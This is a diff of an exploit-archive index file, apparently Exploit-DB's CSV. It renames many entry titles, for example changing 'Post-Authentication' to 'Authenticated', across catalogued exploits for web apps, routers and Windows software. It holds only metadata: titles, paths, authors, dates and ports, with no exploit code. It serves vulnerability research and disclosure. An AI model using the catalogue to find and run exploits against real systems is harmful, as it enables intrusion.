 36205,platforms/hardware/remote/36205.txt,"SonicWALL - SessId Cookie Brute Force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",hardware,remote,0
@@ -32653,7 +32661,7 @@ id,file,description,date,author,platform,type,port
 36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 - 'onlyforuser' Parameter SQL Injection",2011-10-15,"Aung Khant",php,webapps,0
 36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 - Select Element Memory Corruption",2011-10-11,"Ivan Fratric",windows,remote,0
 36262,platforms/windows/webapps/36262.txt,"SolarWinds Orion Service - SQL Injection",2015-03-04,"Brandon Perry",windows,webapps,0
-36263,platforms/linux/remote/36263.rb,"Symantec Web Gateway 5 - restore.php Post-Authentication Command Injection",2015-03-04,Metasploit,linux,remote,443
+36263,platforms/linux/remote/36263.rb,"Symantec Web Gateway 5 - restore.php Authenticated Command Injection",2015-03-04,Metasploit,linux,remote,443
 36211,platforms/windows/dos/36211.txt,"Microsoft Host Integration Server 2004-2010 - Remote Denial Of Service",2011-04-11,"Luigi Auriemma",windows,dos,0
 36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 - 'xml/get_list.php' SQL Injection",2011-10-19,"Yuri Goltsev",php,webapps,0
 36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 - 'cat' Parameter Cross-Site Scripting",2011-10-20,"Eyup CELIK",php,webapps,0
@@ -33074,7 +33082,7 @@ id,file,description,date,author,platform,type,port
 36650,platforms/php/webapps/36650.txt,"OpenEMR 4.1 - contrib/acog/print_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0
 36651,platforms/php/webapps/36651.txt,"OpenEMR 4.1 - Interface/fax/fax_dispatch.php file Parameter exec() Call Arbitrary Shell Command Execution",2012-02-01,"High-Tech Bridge SA",php,webapps,0
 36652,platforms/multiple/remote/36652.py,"w3tw0rk / Pitbull Perl IRC Bot - Remote Code Execution (PoC)",2015-04-06,"Jay Turla",multiple,remote,6667
-36653,platforms/jsp/remote/36653.rb,"JBoss Seam 2 - Arbitrary File Upload and Execution",2015-04-06,Metasploit,jsp,remote,8080
+36653,platforms/jsp/remote/36653.rb,"JBoss Seam 2 - Arbitrary File Upload / Execution",2015-04-06,Metasploit,jsp,remote,8080
 36654,platforms/php/webapps/36654.txt,"phpLDAPadmin 1.2.2 - 'base' Parameter Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0
 36655,platforms/php/webapps/36655.txt,"phpLDAPadmin 1.2.0.5-2 - 'server_id' Parameter Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0
 36656,platforms/php/webapps/36656.txt,"GForge 5.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-02-02,sonyy,php,webapps,0
@@ -33111,7 +33119,7 @@ id,file,description,date,author,platform,type,port
 36687,platforms/php/webapps/36687.txt,"CubeCart 3.0.20 - switch.php r Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0
 36688,platforms/php/webapps/36688.html,"Zen Cart 1.3.9h - 'path_to_admin/product.php' Cross-Site Request Forgery",2012-02-10,DisK0nn3cT,php,webapps,0
 36689,platforms/linux/webapps/36689.txt,"BOA Web Server 0.94.8.2 - Arbitrary File Access",2000-12-19,llmora,linux,webapps,0
-36690,platforms/linux/remote/36690.rb,"Barracuda Firmware 5.0.0.012 - Post-Authentication Remote Root Exploit (Metasploit)",2015-04-09,xort,linux,remote,8000
+36690,platforms/linux/remote/36690.rb,"Barracuda Firmware 5.0.0.012 - Authenticated Remote Root Exploit (Metasploit)",2015-04-09,xort,linux,remote,8000
 36691,platforms/php/webapps/36691.txt,"WordPress Windows Desktop and iPhone Photo Uploader Plugin - Arbitrary File Upload",2015-04-09,"Manish Tanwar",php,webapps,80
 36692,platforms/osx/local/36692.py,"Apple Mac OSX < 10.7.5/10.8.2/10.9.5/10.10.2 - 'Rootpipe' Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0
 36693,platforms/php/webapps/36693.txt,"RabbitWiki - 'title' Parameter Cross-Site Scripting",2012-02-10,sonyy,php,webapps,0
@@ -33174,7 +33182,7 @@ id,file,description,date,author,platform,type,port
 36757,platforms/php/webapps/36757.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'index.php' base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
 36758,platforms/php/webapps/36758.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - admin/base_useradmin.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
 36759,platforms/php/webapps/36759.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - admin/index.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
-36760,platforms/php/webapps/36760.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted File Upload / Arbitrary Code Execution",2012-02-11,indoushka,php,webapps,0
+36760,platforms/php/webapps/36760.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted Arbitrary File Upload / Arbitrary Code Execution",2012-02-11,indoushka,php,webapps,0
 36762,platforms/php/webapps/36762.txt,"WordPress MiwoFTP Plugin 1.0.5 - Multiple Cross-Site Request Forgery Cross-Site Scripting Vulnerabilities",2015-04-14,LiquidWorm,php,webapps,80
 36763,platforms/php/webapps/36763.txt,"WordPress MiwoFTP Plugin 1.0.5 - Cross-Site Request Forgery Arbitrary File Creation (Remote Code Execution)",2015-04-14,LiquidWorm,php,webapps,80
 36764,platforms/php/webapps/36764.txt,"SMW+ 1.5.6 - 'target' Parameter HTML Injection",2012-02-13,sonyy,php,webapps,0
@@ -33363,7 +33371,7 @@ id,file,description,date,author,platform,type,port
 36954,platforms/php/webapps/36954.txt,"WordPress Yet Another Related Posts Plugin 4.2.4 - Cross-Site Request Forgery",2015-05-08,Evex,php,webapps,80
 36955,platforms/osx/remote/36955.py,"MacKeeper - URL Handler Remote Code Execution",2015-05-08,"Braden Thomas",osx,remote,0
 36956,platforms/windows/remote/36956.rb,"Adobe Flash Player - domainMemory ByteArray Use-After-Free",2015-05-08,Metasploit,windows,remote,0
-36957,platforms/php/remote/36957.rb,"WordPress RevSlider 3.0.95 Plugin - Arbitrary File Upload and Execution",2015-05-08,Metasploit,php,remote,80
+36957,platforms/php/remote/36957.rb,"WordPress RevSlider 3.0.95 Plugin - Arbitrary File Upload / Execution",2015-05-08,Metasploit,php,remote,80
 36958,platforms/php/webapps/36958.txt,"WordPress Ultimate Profile Builder Plugin 2.3.3 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",php,webapps,80
 36959,platforms/php/webapps/36959.txt,"WordPress ClickBank Ads Plugin 1.7 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",php,webapps,80
 36960,platforms/windows/webapps/36960.txt,"Manage Engine Asset Explorer 6.1.0 Build: 6110 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",windows,webapps,8080
@@ -33533,7 +33541,7 @@ id,file,description,date,author,platform,type,port
 37136,platforms/php/webapps/37136.txt,"Trombinoscope 3.x - 'photo.php' Server SQL Injection",2012-05-07,"Ramdan Yantu",php,webapps,0
 37137,platforms/php/webapps/37137.txt,"Schneider Electric Telecontrol Kerweb 3.0.0/6.0.0 - 'kw.dll' HTML Injection",2012-05-06,phocean,php,webapps,0
 37138,platforms/php/webapps/37138.txt,"Ramui Forum Script - 'query' Parameter Cross-Site Scripting",2012-05-07,3spi0n,php,webapps,0
-37139,platforms/php/webapps/37139.txt,"JibberBook 2.3 - 'Login_form.php' Authentication Security Bypass",2012-05-07,L3b-r1'z,php,webapps,0
+37139,platforms/php/webapps/37139.txt,"JibberBook 2.3 - 'Login_form.php' Authentication Bypass",2012-05-07,L3b-r1'z,php,webapps,0
 37140,platforms/php/webapps/37140.html,"PHP Enter 4.1.2 - 'banners.php' PHP Code Injection",2012-05-08,L3b-r1'z,php,webapps,0
 37141,platforms/hardware/remote/37141.txt,"Linksys WRT54GL Wireless Router - Cross-Site Request Forgery",2012-05-08,Kalashinkov3,hardware,remote,0
 37142,platforms/php/webapps/37142.txt,"OrangeHRM 2.7 RC - plugins/ajaxCalls/haltResumeHsp.php hspSummaryId Parameter SQL Injection",2012-05-09,"High-Tech Bridge SA",php,webapps,0
@@ -33608,7 +33616,7 @@ id,file,description,date,author,platform,type,port
 37219,platforms/php/webapps/37219.txt,"PHP Address Book 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-17,"Stefan Schurtz",php,webapps,0
 37220,platforms/jsp/webapps/37220.txt,"OpenKM 5.1.7 - Cross-Site Request Forgery",2012-05-03,"Cyrill Brunschwiler",jsp,webapps,0
 37221,platforms/jsp/webapps/37221.txt,"Atlassian JIRA FishEye 2.5.7 / Crucible 2.5.7 Plugins - XML Parsing Unspecified Security",2012-05-17,anonymous,jsp,webapps,0
-37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - (ASP ) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter File Upload / Code Execution",2012-05-21,"Aung Khant",asp,webapps,0
+37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - (ASP ) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution",2012-05-21,"Aung Khant",asp,webapps,0
 37223,platforms/asp/webapps/37223.txt,"Acuity CMS 2.6.2 - '/admin/file_manager/browse.asp' path Parameter Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps,0
 37224,platforms/php/webapps/37224.txt,"Yandex.Server 2010 9.0 - 'text' Parameter Cross-Site Scripting",2012-05-21,MustLive,php,webapps,0
 37225,platforms/php/webapps/37225.pl,"Concrete CMS < 5.5.21 - Multiple Security Vulnerabilities",2012-05-20,AkaStep,php,webapps,0
@@ -33919,7 +33927,7 @@ id,file,description,date,author,platform,type,port
 37567,platforms/php/webapps/37567.txt,"tekno.Portal 0.1b - 'link.php' SQL Injection",2012-08-01,Socket_0x03,php,webapps,0
 37568,platforms/windows/dos/37568.pl,"VLC Media Player - '.3gp' File Divide-by-Zero Denial of Service",2012-08-02,Dark-Puzzle,windows,dos,0
 37569,platforms/multiple/webapps/37569.txt,"ntop - 'arbfile' Parameter Cross-Site Scripting",2012-08-03,"Marcos Garcia",multiple,webapps,0
-37570,platforms/multiple/webapps/37570.py,"Zenoss 3.2.1 - Remote Post-Authentication Command Execution",2012-07-30,"Brendan Coles",multiple,webapps,0
+37570,platforms/multiple/webapps/37570.py,"Zenoss 3.2.1 - Remote Authenticated Command Execution",2012-07-30,"Brendan Coles",multiple,webapps,0
 37571,platforms/multiple/webapps/37571.txt,"Zenoss 3.2.1 - Multiple Security Vulnerabilities",2012-07-30,"Brendan Coles",multiple,webapps,0
 37572,platforms/php/webapps/37572.txt,"Elefant CMS - 'id' Parameter Cross-Site Scripting",2012-08-03,PuN!Sh3r,php,webapps,0
 37573,platforms/multiple/webapps/37573.txt,"Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",multiple,webapps,0
@@ -34074,7 +34082,7 @@ id,file,description,date,author,platform,type,port
 37731,platforms/windows/remote/37731.py,"PCMan FTP Server 2.0.7 - PUT Command Buffer Overflow",2015-08-07,"Jay Turla",windows,remote,21
 37732,platforms/win_x86/local/37732.c,"Microsoft Windows XP SP3 x86 / 2003 SP2 (x86) - 'NDProxy' Privilege Escalation (MS14-002)",2015-08-07,"Tomislav Paskalev",win_x86,local,0
 37734,platforms/php/webapps/37734.html,"Microweber 1.0.3 - Persistent Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-07,LiquidWorm,php,webapps,80
-37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 - Arbitrary File Upload Filter Bypass Remote PHP Code Execution",2015-08-07,LiquidWorm,php,webapps,80
+37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / Remote PHP Code Execution",2015-08-07,LiquidWorm,php,webapps,80
 37747,platforms/windows/dos/37747.py,"Havij Pro - Crash (PoC)",2015-08-10,i_7e1,windows,dos,0
 37753,platforms/php/webapps/37753.txt,"WordPress Simple Image Manipulator Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
 37738,platforms/php/webapps/37738.txt,"WordPress Job Manager Plugin 0.7.22 - Persistent Cross-Site Scripting",2015-08-07,"Owais Mehtab",php,webapps,80
@@ -34155,7 +34163,7 @@ id,file,description,date,author,platform,type,port
 37808,platforms/windows/remote/37808.py,"Easy File Management Web Server 5.6 - USERID Remote Buffer Overflow",2015-08-18,"Tracy Turben",windows,remote,0
 37809,platforms/php/webapps/37809.php,"Nuts CMS - Remote PHP Code Injection / Execution",2015-08-17,"Yakir Wizman",php,webapps,80
 37810,platforms/windows/dos/37810.txt,"FTP Commander 8.02 - Overwrite (SEH)",2015-08-18,Un_N0n,windows,dos,0
-37811,platforms/php/webapps/37811.py,"Magento CE < 1.9.0.1 - Post-Authentication Remote Code Execution",2015-08-18,Ebrietas0,php,webapps,80
+37811,platforms/php/webapps/37811.py,"Magento CE < 1.9.0.1 - Authenticated Remote Code Execution",2015-08-18,Ebrietas0,php,webapps,80
 37812,platforms/win_x86/remote/37812.rb,"Symantec Endpoint Protection Manager - Authentication Bypass / Code Execution",2015-08-18,Metasploit,win_x86,remote,8443
 37813,platforms/windows/local/37813.rb,"VideoCharge Studio - Buffer Overflow (SEH)",2015-08-18,Metasploit,windows,local,0
 37814,platforms/python/remote/37814.rb,"Werkzeug - Debug Shell Command Execution",2015-08-18,Metasploit,python,remote,0
@@ -34271,9 +34279,9 @@ id,file,description,date,author,platform,type,port
 37927,platforms/php/webapps/37927.txt,"Netsweeper 4.0.4 - SQL Injection",2015-08-21,"Anastasios Monachos",php,webapps,0
 37928,platforms/php/webapps/37928.txt,"Netsweeper 4.0.8 - SQL Injection Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0
 37929,platforms/php/webapps/37929.txt,"Netsweeper 4.0.8 - Authentication Bypass Issue",2015-08-21,"Anastasios Monachos",php,webapps,0
-37930,platforms/php/webapps/37930.txt,"Netsweeper 4.0.9 - Arbitrary File Upload and Execution",2015-08-21,"Anastasios Monachos",php,webapps,0
+37930,platforms/php/webapps/37930.txt,"Netsweeper 4.0.9 - Arbitrary File Upload / Execution",2015-08-21,"Anastasios Monachos",php,webapps,0
 37931,platforms/php/webapps/37931.txt,"Netsweeper 3.0.6 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0
-37932,platforms/php/webapps/37932.txt,"Netsweeper 4.0.8 - Arbitrary File Upload and Execution",2015-08-21,"Anastasios Monachos",php,webapps,0
+37932,platforms/php/webapps/37932.txt,"Netsweeper 4.0.8 - Arbitrary File Upload / Execution",2015-08-21,"Anastasios Monachos",php,webapps,0
 37933,platforms/php/webapps/37933.txt,"Netsweeper 4.0.8 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0
 37934,platforms/php/webapps/37934.txt,"WordPress Shopp Plugin - Multiple Security Vulnerabilities",2012-10-05,T0x!c,php,webapps,0
 37935,platforms/php/webapps/37935.txt,"Interspire Email Marketer - (Cross-Site Scripting / HTML Injection / SQL Injection) Multiple Vulnerabilities",2012-10-08,"Ibrahim El-Sayed",php,webapps,0
@@ -34307,7 +34315,7 @@ id,file,description,date,author,platform,type,port
 37980,platforms/windows/dos/37980.pl,"Microsoft Excel - Denial of Service",2012-10-11,"Jean Pascal Pereira",windows,dos,0
 37981,platforms/windows/dos/37981.pl,"Microsoft Paint 5.1 - '.bmp' Denial of Service",2012-10-27,coolkaveh,windows,dos,0
 37982,platforms/hardware/remote/37982.pl,"TP-Link TL-WR841N Router - Local File Inclusion",2012-10-29,"Matan Azugi",hardware,remote,0
-37983,platforms/php/webapps/37983.php,"EasyITSP - 'customers_edit.php' Authentication Security Bypass",2012-10-26,"Michal Blaszczak",php,webapps,0
+37983,platforms/php/webapps/37983.php,"EasyITSP - 'customers_edit.php' Authentication Bypass",2012-10-26,"Michal Blaszczak",php,webapps,0
 37984,platforms/windows/dos/37984.pl,"KMPlayer 3.0.0.1440 - '.avi' File Local Denial of Service",2012-10-26,Am!r,windows,dos,0
 37985,platforms/windows/remote/37985.py,"FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution",2015-08-27,"Naser Farhadi",windows,remote,80
 37986,platforms/windows/dos/37986.txt,"Xion Audio Player 1.5 build 155 - Stack Based Buffer Overflow",2015-08-27,Un_N0n,windows,dos,0
@@ -34324,7 +34332,7 @@ id,file,description,date,author,platform,type,port
 37997,platforms/ios/dos/37997.txt,"Photo Transfer (2) 1.0 iOS - Denial of Service",2015-08-28,Vulnerability-Lab,ios,dos,3030
 37998,platforms/php/webapps/37998.txt,"WordPress Responsive Thumbnail Slider Plugin 1.0 - Arbitrary File Upload",2015-08-28,"Arash Khazaei",php,webapps,80
 37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross-Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0
-38000,platforms/php/webapps/38000.txt,"Wolf CMS - Arbitrary File Upload and Execution",2015-08-28,"Narendra Bhati",php,webapps,80
+38000,platforms/php/webapps/38000.txt,"Wolf CMS - Arbitrary File Upload / Execution",2015-08-28,"Narendra Bhati",php,webapps,80
 38002,platforms/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80
 38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - GET Command Buffer Overflow",2015-08-29,Koby,windows,remote,21
 38004,platforms/hardware/webapps/38004.txt,"Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure",2015-08-29,"Shad Malloy",hardware,webapps,80
@@ -34556,7 +34564,7 @@ id,file,description,date,author,platform,type,port
 38250,platforms/multiple/remote/38250.html,"Novell Groupwise Client 8.0 - Multiple Remote Code Execution Vulnerabilities",2013-01-31,"High-Tech Bridge",multiple,remote,0
 38251,platforms/php/webapps/38251.txt,"WordPress WP-Table Reloaded Plugin - 'id' Parameter Cross-Site Scripting",2013-01-24,hiphop,php,webapps,0
 38252,platforms/windows/remote/38252.py,"Konica Minolta FTP Utility 1.0 - Remote Command Execution",2015-09-20,R-73eN,windows,remote,21
-38254,platforms/windows/remote/38254.rb,"Konica Minolta FTP Utility 1.00 - Post-Authentication CWD Command SEH Overflow",2015-09-21,Metasploit,windows,remote,21
+38254,platforms/windows/remote/38254.rb,"Konica Minolta FTP Utility 1.00 - Authenticated CWD Command SEH Overflow",2015-09-21,Metasploit,windows,remote,21
 38255,platforms/php/webapps/38255.txt,"Kirby CMS 2.1.0 - Authentication Bypass",2015-09-22,"Dawid Golunski",php,webapps,80
 38259,platforms/windows/dos/38259.py,"MASM32 11R - Crash (PoC)",2015-09-22,VIKRAMADITYA,windows,dos,0
 38260,platforms/windows/remote/38260.php,"Konica Minolta FTP Utility 1.0 - Directory Traversal",2015-09-22,shinnai,windows,remote,21
@@ -34701,7 +34709,7 @@ id,file,description,date,author,platform,type,port
 38404,platforms/windows/dos/38404.py,"LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow",2015-10-06,hyp3rlinx,windows,dos,0
 38405,platforms/windows/dos/38405.py,"Last PassBroker 3.2.16 - Stack Based Buffer Overflow",2015-10-06,Un_N0n,windows,dos,0
 38406,platforms/php/webapps/38406.txt,"PHP-Fusion v7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",php,webapps,0
-38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - Remote Code Execution (via File Upload Filter Bypass)",2015-10-06,"Raffaele Forte",php,webapps,0
+38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 -  Arbitrary File Upload / Filter Bypass / Remote Code Execution",2015-10-06,"Raffaele Forte",php,webapps,0
 38408,platforms/php/webapps/38408.txt,"Jaow CMS - 'add_ons' Parameter Cross-Site Scripting",2013-03-23,Metropolis,php,webapps,0
 38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N - Unauthenticated Config Download",2015-10-06,"Todor Donev",hardware,webapps,0
 38410,platforms/php/webapps/38410.txt,"WordPress Banners Lite Plugin - 'wpbanners_show.php' HTML Injection",2013-03-25,"Fernando A. Lagos B",php,webapps,0
@@ -34740,7 +34748,7 @@ id,file,description,date,author,platform,type,port
 38443,platforms/php/webapps/38443.txt,"Liferay 6.1.0 CE - Privilege Escalation",2015-10-11,"Massimo De Luca",php,webapps,0
 38444,platforms/win_x86/dos/38444.py,"Tomabo MP4 Converter 3.10.12 < 3.11.12 - '.m3u' Denial of service (Crush Application)",2015-10-11,"mohammed Mohammed",win_x86,dos,0
 38445,platforms/php/webapps/38445.txt,"Joomla Real Estate Manager Component 3.7 - SQL Injection",2015-10-11,"Omer Ramić",php,webapps,0
-38446,platforms/php/webapps/38446.html,"Dream CMS 2.3.0 - Cross-Site Request Forgery Add Extension / Arbitrary File Upload PHP Code Execution",2015-10-11,LiquidWorm,php,webapps,0
+38446,platforms/php/webapps/38446.html,"Dream CMS 2.3.0 - Cross-Site Request Forgery (Add Extension) / Arbitrary File Upload / PHP Code Execution",2015-10-11,LiquidWorm,php,webapps,0
 38448,platforms/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - Directory Traversal",2015-10-13,"Karn Ganeshen",hardware,webapps,0
 38449,platforms/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps,0
 38450,platforms/php/webapps/38450.txt,"Kerio Control 8.6.1 - Multiple Vulnerabilities",2015-10-13,"Raschin Tavakoli",php,webapps,0
@@ -34914,7 +34922,7 @@ id,file,description,date,author,platform,type,port
 38626,platforms/multiple/dos/38626.py,"FileCOPA FTP Server - Remote Denial of Service",2013-07-01,Chako,multiple,dos,0
 38627,platforms/android/remote/38627.sh,"Google Android - 'APK' code Remote Security Bypass",2013-07-03,"Bluebox Security",android,remote,0
 38628,platforms/php/webapps/38628.txt,"HostBill - 'cpupdate.php' Authentication Bypass",2013-05-29,localhost.re,php,webapps,0
-38629,platforms/php/webapps/38629.txt,"vBulletin 5.1.x - Pre-Authentication Remote Code Execution",2015-11-05,hhjj,php,webapps,0
+38629,platforms/php/webapps/38629.txt,"vBulletin 5.1.x - Unauthenticated Remote Code Execution",2015-11-05,hhjj,php,webapps,0
 38642,platforms/php/webapps/38642.txt,"Serendipity 1.6.2 - 'serendipity_admin_image_selector.php' Cross-Site Scripting",2013-07-12,"Omar Kurt",php,webapps,0
 38633,platforms/multiple/remote/38633.pl,"Intelligent Platform Management Interface - Information Disclosure",2013-07-02,"Dan Farmer",multiple,remote,0
 38634,platforms/ios/remote/38634.txt,"Air Drive Plus - Multiple Input Validation Vulnerabilities",2013-07-09,"Benjamin Kunz Mejri",ios,remote,0
@@ -35553,8 +35561,8 @@ id,file,description,date,author,platform,type,port
 39298,platforms/php/webapps/39298.txt,"WordPress Epic Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
 39299,platforms/php/webapps/39299.txt,"WordPress Antioch Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
 39300,platforms/php/webapps/39300.txt,"WordPress Spider Facebook Plugin - 'facebook.php' SQL Injection",2014-09-07,"Claudio Viviani",php,webapps,0
-39301,platforms/php/webapps/39301.html,"WordPress Ninja Forms 2.7.7 Plugin - Authorization Bypass",2014-09-08,Voxel@Night,php,webapps,0
-39302,platforms/php/webapps/39302.html,"WordPress WP to Twitter Plugin - Authorization Bypass",2014-09-08,Voxel@Night,php,webapps,0
+39301,platforms/php/webapps/39301.html,"WordPress Ninja Forms 2.7.7 Plugin - Authentication Bypass",2014-09-08,Voxel@Night,php,webapps,0
+39302,platforms/php/webapps/39302.html,"WordPress WP to Twitter Plugin - Authentication Bypass",2014-09-08,Voxel@Night,php,webapps,0
 39303,platforms/php/webapps/39303.txt,"WordPress Xhanch My Twitter Plugin - Cross-Site Request Forgery",2014-09-08,Voxel@Night,php,webapps,0
 39304,platforms/php/webapps/39304.txt,"WordPress W3 Total Cache Plugin - 'admin.php' Cross-Site Request Forgery",2014-09-08,Voxel@Night,php,webapps,0
 39305,platforms/freebsd/dos/39305.py,"FreeBSD SCTP ICMPv6 - Error Processing",2016-01-25,ptsecurity,freebsd,dos,0
@@ -35928,7 +35936,7 @@ id,file,description,date,author,platform,type,port
 39705,platforms/php/webapps/39705.txt,"WordPress Kento Post View Counter Plugin 2.8 - Cross-Site Request Forgery / Cross-Site Scripting",2016-04-18,cor3sm4sh3r,php,webapps,80
 39706,platforms/hardware/dos/39706.txt,"TH692 Outdoor P2P HD Waterproof IP Camera - Hard Coded Credentials",2016-04-18,DLY,hardware,dos,0
 39707,platforms/php/webapps/39707.txt,"Webutler CMS 3.2 - Cross-Site Request Forgery",2016-04-18,"Keerati T.",php,webapps,80
-39708,platforms/multiple/remote/39708.rb,"Novell ServiceDesk - Authenticated File Upload",2016-04-18,Metasploit,multiple,remote,80
+39708,platforms/multiple/remote/39708.rb,"Novell ServiceDesk - Authenticated Arbitrary File Upload",2016-04-18,Metasploit,multiple,remote,80
 39709,platforms/php/webapps/39709.txt,"pfSense Community Edition 2.2.6 - Multiple Vulnerabilities",2016-04-18,Security-Assessment.com,php,webapps,443
 39710,platforms/php/webapps/39710.txt,"modified eCommerce Shopsoftware 2.0.0.0 rev 9678 - Blind SQL Injection",2016-04-19,"Felix Maduakor",php,webapps,80
 39711,platforms/php/webapps/39711.php,"PHPBack 1.3.0 - SQL Injection",2016-04-20,hyp3rlinx,php,webapps,80
@@ -36094,7 +36102,7 @@ id,file,description,date,author,platform,type,port
 39965,platforms/php/webapps/39965.txt,"Tiki-Wiki CMS Calendar 14.2 / 12.5 LTS / 9.11 LTS / 6.15 - Remote Code Execution",2016-06-16,"Dany Ouellet",php,webapps,80
 39879,platforms/php/webapps/39879.txt,"Joomla SecurityCheck Extension 2.8.9 - Multiple Vulnerabilities",2016-06-02,"ADEO Security",php,webapps,80
 39880,platforms/jsp/webapps/39880.txt,"Liferay CE < 6.2 CE GA6 - Persistent Cross-Site Scripting",2016-06-02,"Fernando Câmara",jsp,webapps,0
-39881,platforms/php/webapps/39881.txt,"Relay Ajax Directory Manager relayb01-071706 / 1.5.1 / 1.5.3 - Unauthenticated File Upload",2016-06-02,"RedTeam Pentesting GmbH",php,webapps,80
+39881,platforms/php/webapps/39881.txt,"Relay Ajax Directory Manager relayb01-071706 / 1.5.1 / 1.5.3 - Unauthenticated Arbitrary File Upload",2016-06-02,"RedTeam Pentesting GmbH",php,webapps,80
 39882,platforms/multiple/dos/39882.txt,"Websockify (C Implementation) 0.8.0 - Buffer Overflow",2016-06-02,"RedTeam Pentesting GmbH",multiple,dos,0
 39884,platforms/php/webapps/39884.html,"Dream Gallery 1.0 - Cross-Site Request Forgery (Add Admin)",2016-06-06,"Ali Ghanbari",php,webapps,80
 39885,platforms/multiple/shellcode/39885.c,"Linux/Windows/BSD x86_64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,multiple,shellcode,0
@@ -36145,7 +36153,7 @@ id,file,description,date,author,platform,type,port
 39930,platforms/osx/dos/39930.c,"Apple Mac OSX - Kernel Stack Buffer Overflow in GeForce GPU Driver",2016-06-10,"Google Security Research",osx,dos,0
 39931,platforms/php/webapps/39931.txt,"FRticket Ticket System - Persistent Cross-Site Scripting",2016-06-13,"Hamit Abis",php,webapps,80
 39932,platforms/php/webapps/39932.html,"Viart Shopping Cart 5.0 - Cross-Site Request Forgery / Arbitrary File Upload",2016-06-13,"Ali Ghanbari",php,webapps,80
-39933,platforms/windows/local/39933.py,"Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal DEP + ASLR Bypass)",2016-06-13,"Fitzl Csaba",windows,local,0
+39933,platforms/windows/local/39933.py,"Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal ASLR + DEP Bypass)",2016-06-13,"Fitzl Csaba",windows,local,0
 39934,platforms/php/webapps/39934.txt,"Dream Gallery 2.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
 39935,platforms/php/webapps/39935.txt,"Grid Gallery 1.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
 39936,platforms/php/webapps/39936.txt,"Joomla PayPlans (com_payplans) Extension 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80
@@ -36179,7 +36187,7 @@ id,file,description,date,author,platform,type,port
 39964,platforms/php/webapps/39964.html,"SlimCMS 0.1 - Cross-Site Request Forgery (Change Admin Password)",2016-06-16,"Avinash Thapa",php,webapps,80
 39969,platforms/php/webapps/39969.php,"WordPress Gravity Forms Plugin 1.8.19 - Arbitrary File Upload",2016-06-17,"Abk Khan",php,webapps,80
 39970,platforms/php/webapps/39970.txt,"Vicidial 2.11 - Scripts Persistent Cross-Site Scripting",2016-06-17,"David Silveiro",php,webapps,80
-39971,platforms/php/webapps/39971.php,"phpATM 1.32 - Remote Command Execution (Arbitrary File Upload) on Windows Servers",2016-06-17,"Paolo Massenio",php,webapps,80
+39971,platforms/php/webapps/39971.php,"phpATM 1.32 - Arbitrary File Upload / Remote Command Execution (Windows Servers)",2016-06-17,"Paolo Massenio",php,webapps,80
